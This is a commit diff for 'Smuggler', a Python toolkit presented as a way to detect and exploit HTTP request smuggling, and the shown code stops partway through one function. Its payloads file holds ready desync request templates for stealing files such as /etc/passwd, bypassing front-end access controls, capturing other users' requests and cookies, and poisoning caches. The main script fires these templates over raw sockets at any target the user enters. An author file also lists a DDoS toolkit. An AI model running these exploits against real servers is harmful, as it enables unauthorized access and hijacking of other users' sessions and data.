Browse Source

initial commit

epsylon 3 years ago
parent
commit
d4ed04517c
6 changed files with 889 additions and 76 deletions
  1. 50 2
      README.md
  2. 48 0
      docs/AUTHOR
  3. 46 0
      docs/COMMITMENT
  4. 52 74
      LICENSE
  5. 51 0
      payloads/payloads.py
  6. 642 0
      smuggler.py

+ 50 - 2
README.md

@@ -1,3 +1,51 @@
-# Smuggler
 
-Smuggler is a free software tool to detect and exploit -HTTP Smuggling- vulnerabilities.
+![c](https://03c8.net/images/smuggler_banner.png)
+
+----------
+
+#### Info:
+ 
+ Smuggler is a free software tool to detect and exploit -HTTP Smuggling- vulnerabilities.
+
+ HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. 
+
+ Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.
+
+#### Installing:
+
+ This tool runs on many platforms and it requires Python (3.x.y).
+
+#### Executing:
+  
+  python smuggler.py (or python3 smuggler.py)
+
+----------
+
+#### License:
+
+ Smuggler is released under the GPLv3.
+
+#### Contact:
+
+      - psy (epsylon@riseup.net)
+
+#### Contribute: 
+
+ To make donations use the following hash:
+  
+     - Bitcoin: 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
+
+----------
+
+####  Screenshots:
+
+![c](https://03c8.net/images/smuggler_detection.png)
+
+![c](https://03c8.net/images/smuggler_detection2.png)
+
+![c](https://03c8.net/images/smuggler_exploit.png)
+
+![c](https://03c8.net/images/smuggler_exploit2.png)
+
+![c](https://03c8.net/images/smuggler_results.png)
+

+ 48 - 0
docs/AUTHOR

@@ -0,0 +1,48 @@
+========================
+
+ nick: psy (epsylon)
+  
+  <epsylon@riseup.net> 
+
+ web: https://03c8.net
+
+=======================
+
+ code:
+
+ - https://code.03c8.net/epsylon
+ - https://github.com/epsylon
+
+=======================
+
+ software/projects:
+
+ - Anarcha-Pragmatism: Intellectual model (and movement) based on the culture of the "action/reaction".
+ - AnonTwi: Tool for OAuth2 applications (such as: GNUSocial, Twitter) that provides different layers of privacy/encryption.
+ - BrAInStocker: Tool to predict (using Linear Regression) the next number within a series of random numbers.
+ - Bordercheck: Tool to visualize 'real-time' on a world map the geolocation of data when surfing the web.
+ - CIntruder: Tool to bypass captchas using OCR (Optical Character Recognition) bruteforcing methods.
+ - Collatz: Tool to simulate the Collatz's conjeture.
+ - DiaNA: Tool for the search and recognition of patterns in DNA sequences.
+ - DieKunstDerFuge: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
+ - ECOin: Decentralized key/value registration and transfer system based on Bitcoin technology (a cryptocurrency).
+ - Euler-Bricks: Tool to search for Euler's "bricks".
+ - Goldbach: Tool to simulate the Goldbach's conjeture.
+ - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network. 
+ - Orb: Tool for massive footprinting.
+ - PandeMaths: Tool that simulates a mathematical model of pandemics.
+ - pArAnoIA-Browser: Tool designed to surf the Internet using some "paranoic" methods.
+ - Propagare: Tool for extraction, organization and semantic analysis of newspapers.
+ - PyAISnake: Tool to train AI models on solve spatial problems through the classic video game "snake".
+ - PyDog4Apache: Tool to sneak logs from Apache web server.
+ - Smuggler: Tool to detect and exploit HTTP Smuggling vulnerabilities.
+ - UFONet: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
+ - XSSer: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+=======================
+
+ BTC: 
+
+  19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
+
+========================

+ 46 - 0
docs/COMMITMENT

@@ -0,0 +1,46 @@
+GPL Cooperation Commitment
+Version 1.0
+
+Before filing or continuing to prosecute any legal proceeding or claim
+(other than a Defensive Action) arising from termination of a Covered
+License, we commit to extend to the person or entity ('you') accused
+of violating the Covered License the following provisions regarding
+cure and reinstatement, taken from GPL version 3. As used here, the
+term 'this License' refers to the specific Covered License being
+enforced.
+
+    However, if you cease all violation of this License, then your
+    license from a particular copyright holder is reinstated (a)
+    provisionally, unless and until the copyright holder explicitly
+    and finally terminates your license, and (b) permanently, if the
+    copyright holder fails to notify you of the violation by some
+    reasonable means prior to 60 days after the cessation.
+
+    Moreover, your license from a particular copyright holder is
+    reinstated permanently if the copyright holder notifies you of the
+    violation by some reasonable means, this is the first time you
+    have received notice of violation of this License (for any work)
+    from that copyright holder, and you cure the violation prior to 30
+    days after your receipt of the notice.
+
+We intend this Commitment to be irrevocable, and binding and
+enforceable against us and assignees of or successors to our
+copyrights.
+
+Definitions
+
+'Covered License' means the GNU General Public License, version 2
+(GPLv2), the GNU Lesser General Public License, version 2.1
+(LGPLv2.1), or the GNU Library General Public License, version 2
+(LGPLv2), all as published by the Free Software Foundation.
+
+'Defensive Action' means a legal proceeding or claim that We bring
+against you in response to a prior proceeding or claim initiated by
+you or your affiliate.
+
+'We' means each contributor to this repository as of the date of
+inclusion of this file, including subsidiaries of a corporate
+contributor.
+
+This work is available under a Creative Commons Attribution-ShareAlike
+4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).

File diff suppressed because it is too large
+ 52 - 74
LICENSE


+ 51 - 0
payloads/payloads.py

@@ -0,0 +1,51 @@
+#!/usr/bin/env python3 
+# -*- coding: utf-8 -*-"
+"""
+Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+payloads={
+	'CL-CL-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 6\r\nContent-Length: 7\n\n3\nabc\nQ',
+	'CL-CL-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 6\r\nContent-Length: 7\n\n0\n\nX',
+	'TE-TE-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n3\nabc\nQ',
+	'TE-TE-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nX',
+	'TE-CL-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nContent-Length: 6\n\n3\nabc\nQ',
+	'TE-CL-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nContent-Length: 5\n\nX\n\n0\n\nX',
+	'CL-TE-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\n\n3\nabc\nQ',
+	'CL-TE-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\n\n0\n\nX'
+	 }
+
+exploits={
+	'EXPLOIT-0#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1\r\nContent-Length: $CL\n\np=$files',
+	'EXPLOIT-1_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
+	'EXPLOIT-1_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
+	'EXPLOIT-1_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
+	'EXPLOIT-1_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
+	'EXPLOIT-2_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter=',
+	'EXPLOIT-2_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter=',
+	'EXPLOIT-2_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter=',
+	'EXPLOIT-2_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter='
+	'EXPLOIT-3_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
+	'EXPLOIT-3_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
+	'EXPLOIT-3_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
+	'EXPLOIT-3_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
+	'EXPLOIT-4_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
+	'EXPLOIT-4_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
+	'EXPLOIT-4_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
+	'EXPLOIT-4_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
+	'EXPLOIT-5_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-5_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-5_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-5_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-6_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-6_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-6_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-6_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
+	'EXPLOIT-7_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
+	'EXPLOIT-7_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
+	'EXPLOIT-7_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
+	'EXPLOIT-7_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
+         }

+ 642 - 0
smuggler.py

@@ -0,0 +1,642 @@
+#!/usr/bin/env python3 
+# -*- coding: utf-8 -*-"
+"""
+Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, socket, ssl
+
+VERSION = "v0.1_beta"
+RELEASE = "25_04_2020"
+SOURCE1 = "https://code.03c8.net/epsylon/smuggler"
+SOURCE2 = "https://github.com/epsylon/smuggler"
+CONTACT = "epsylon@riseup.net - (https://03c8.net)"
+
+try:
+    import payloads.payloads # import payloads
+except:
+    print ("\n[Info] Try to run the tool with Python3.x.y... (ex: python3 smuggler.py) -> [EXITING!]\n")
+    sys.exit()
+
+VULNERABLE_LIST = []
+
+def set_target():
+    target = input("\n  + Enter DOMAIN/IP (ex: 'http(s)://www.target.com'): ").lower()
+    if target.startswith("http://"):
+        target = target.replace("http://","")
+        port = 80
+        SSL = False
+    elif target.startswith("https://"):
+        target = target.replace("https://","")
+        port = 443
+        SSL = True
+    else:
+        print("\n[Error] Target is invalid: '"+str(target)+"'\n")
+        print("="*50)
+        sys.exit()
+    method = input("\n  + Enter HTTP Method (ex: POST): ").upper()
+    if method == "GET" or method == "POST":
+        pass
+    else:
+        print("\n[Error] Method is invalid: '"+str(method)+"'\n")
+        print("="*50)
+        sys.exit()
+    path = input("\n  + Enter PATH (ex: '/'): ")
+    if path == "":
+        path = "/"
+    return target, port, SSL, method, path
+
+def detect(): # detect menu
+    target, port, SSL, method, path = set_target() # set target
+    print("\n"+"="*50 + "\n")
+    print("[Info] Starting HTTP Smuggling detection ...")
+    payloads_dsync = payloads.payloads.payloads # load payloads
+    addr = (target, port)
+    print("")
+    for payload in payloads_dsync:
+        attack_type = payload.split("#")[0]
+        payload_type = payload.split("#")[1]
+        print("="*50)
+        print("Trying payload: ["+str(attack_type)+"]")
+        print("="*50+"\n")
+        payload = method+" "+path+" HTTP/1.1\r\nHost: "+target+"\r\n"+payload_type
+        print("+ PAYLOAD:\n")
+        print(payload)
+        send_payload(attack_type, payload, addr, SSL) # send each payload
+    show_results(target, port, method, path) # show final results
+
+def send_payload(attack_type, payload, addr, SSL):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    if SSL == True: # ssl
+        ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
+    try:
+        if SSL == True: # ssl
+            ss.connect(addr)
+        else:
+            s.connect(addr)
+    except:
+        print("-"*45)
+        print("[Error] Generating socket... -> [PASSING!]")
+        print("-"*45+"\n")
+        s.close()
+        if SSL == True: # ssl
+            ss.close()
+        return
+    for i in range(1,20): # 20x tests
+        if SSL == True: # ssl
+            ss.send(payload.encode('utf-8'))
+        else:
+            s.send(payload.encode('utf-8'))
+    datas=""
+    while 1:
+        if SSL == True: # ssl
+            data = ss.recv(1024)
+        else:
+            data = s.recv(1024)
+        if not data:        
+            break
+        datas += str(data.decode('utf-8'))
+    print("\n+ REPLY:\n")
+    print(str(datas))
+    resp_c=0
+    resp=""
+    wait=False
+    for line in datas.split('\n'):
+        if line.startswith('HTTP/1.1 400 BAD_REQUEST') or line.startswith('HTTP/1.1 400 Bad Request') or line.startswith('HTTP/1.1 400 BAD REQUEST'):
+            wait=True
+        elif line.startswith('HTTP/1.0 400 BAD_REQUEST') or line.startswith('HTTP/1.0 400 Bad Request') or line.startswith('HTTP/1.0 400 BAD REQUEST'):
+            wait=True
+        elif line.startswith('HTTP/1.1 '):
+            wait=False
+            resp_c+=1
+        if not wait:
+            resp += line+'\n'
+    print("-"*45)
+    if resp_c > 0:
+        print ("PAYLOAD: ["+str(attack_type)+"] is WORKING! ;-)")
+        VULNERABLE_LIST.append(attack_type) # add attack type for results
+    else:
+        print ("PAYLOAD: ["+str(attack_type)+"] is NOT working...")
+    print("-"*45+"\n")
+    s.close()
+    if SSL == True: # ssl
+        ss.close()
+
+def show_results(target, port, method, path):
+    print("="*50)
+    print("\n+ FINAL RESULTS: -HTTP Smuggling- Attack\n")
+    print("-"*45+"\n")
+    print("  - TARGET: "+str(target)+":"+str(port))
+    print("  - Method: "+str(method))
+    print("  - Path  : "+str(path))
+    CLCL = False
+    TETE = False
+    TECL = False
+    CLTE = False 
+    if VULNERABLE_LIST: 
+        print("\n  - STATUS: [ VULNERABLE !!! ]\n")
+        for v in VULNERABLE_LIST: # resume vulnerable payloads found
+            if v.startswith("CL-CL") and CLCL == False: # CL-CL
+                print("    * [CL-CL]: [Front-end: Content Length] <-> [Back-end: Content Length]")
+                CLCL = True
+            elif v.startswith("TE-TE") and TETE == False: # TE-TE
+                print("    * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]")
+                TETE = True
+            elif v.startswith("TE-CL") and TECL == False: # TE-CL
+                print("    * [TE-CL]: [Front-end: Transfer-Encoding] <-> [Back-end: Content Length]")
+                TECL = True
+            elif v.startswith("CL-TE") and CLTE == False: # CL-TE
+                print("    * [CL-TE]: [Front-end: Content-Length] <-> [Back-end: Transfer-Encoding]")
+                CLTE = True
+            else:
+                pass
+    else:
+        print("\n  - STATUS: [ NOT VULNERABLE ]")
+    print("\n"+"="*50+"\n")
+
+def exploit(): # exploit menu
+    exploit = input("\n+ SELECT EXPLOIT:\n\n  (0) Steal files (ex: '/etc/passwd')\n  (1) Bypass Front-End Security Controls\n  (2) Reveal Front-End Rewriting\n  (3) Capture Users Requests\n  (4) Re-Exploit a XSS Reflected\n  (5) Turn into an Open-Redirect\n  (6) Web Cache Poisoning\n  (7) Web Cache Deception\n\n")
+    if exploit == "0": # steal files
+        exploit_steal()
+    elif exploit == "1": # bypass front-end
+        exploit_bypass()
+    elif exploit == "2": # reveal front-edn rewriting
+        exploit_reveal()
+    elif exploit == "3": # capture users requests
+        exploit_capture()
+    elif exploit == "4": # re-exploit xss reflection
+        exploit_xss()
+    elif exploit == "5": # turn into open-redirect 'zombie'
+        exploit_openredirect()
+    elif exploit == "6": # webcache poisoning
+        exploit_poison()
+    elif exploit == "7": # webcache deception
+        exploit_deception()
+    else: # exit
+        print ("[Info] Not any valid exploit selected... -> [EXITING!]\n")
+        sys.exit()
+
+def send_exploit(addr, SSL, exploit):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    if SSL == True: # ssl
+        ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
+    try:
+        if SSL == True: # ssl
+            ss.connect(addr)
+        else:
+            s.connect(addr)
+    except:
+        print("\n"+"-"*45)
+        print("[Error] Generating socket... -> [PASSING!]")
+        print("-"*45+"\n")
+        s.close()
+        if SSL == True: # ssl
+            ss.close()
+        return
+    if SSL == True: # ssl
+        ss.send(exploit.encode('utf-8'))
+    else:
+        s.send(exploit.encode('utf-8'))
+    datas=""
+    while 1:
+        if SSL == True: # ssl
+            data = ss.recv(1024)
+        else:
+            data = s.recv(1024)
+        if not data:
+            break
+        datas += str(data.decode('utf-8'))
+    print("\n+ REPLY:\n")
+    print(str(datas))
+
+def exploit_bypass():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to Bypass Front-End Security Controls...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    restricted_path = input("\n  + Enter RESTRICTED ZONE (ex: '/admin'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '50'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 50
+    if not content_length:
+        content_length = 50
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 1 TE-CL
+                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 1 CL-TE
+                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 1 TE-TE
+                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 1 CL-CL
+                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$restricted_path", restricted_path)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$restricted_path", restricted_path)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_reveal():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to Reveal Front-End Rewriting...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    parameter = input("\n  + Enter PARAMETER reflected (ex: 'user'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '130'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 130
+    if not content_length:
+        content_length = 130
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 2 TE-CL
+                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 2 CL-TE
+                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 2 TE-TE
+                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 2 CL-CL
+                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$parameter", parameter)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$parameter", parameter)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_capture():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to Capture Users Requests (cookies, other sensitive data, etc)...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    parameters = input("\n  + Enter PARAMETERS (ex: 'csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Admin&comment='): ")
+    cookie    = input("\n  + Enter COOKIE (ex: 'session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '130'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 130
+    if not content_length:
+        content_length = 130
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 3 TE-CL
+                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 3 CL-TE
+                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 3 TE-TE
+                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 3 CL-CL
+                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$parameters", parameters)
+                exploit = exploit.replace("$cookie", cookie)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$parameters", parameters)
+    exploit = exploit.replace("$cookie", cookie)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
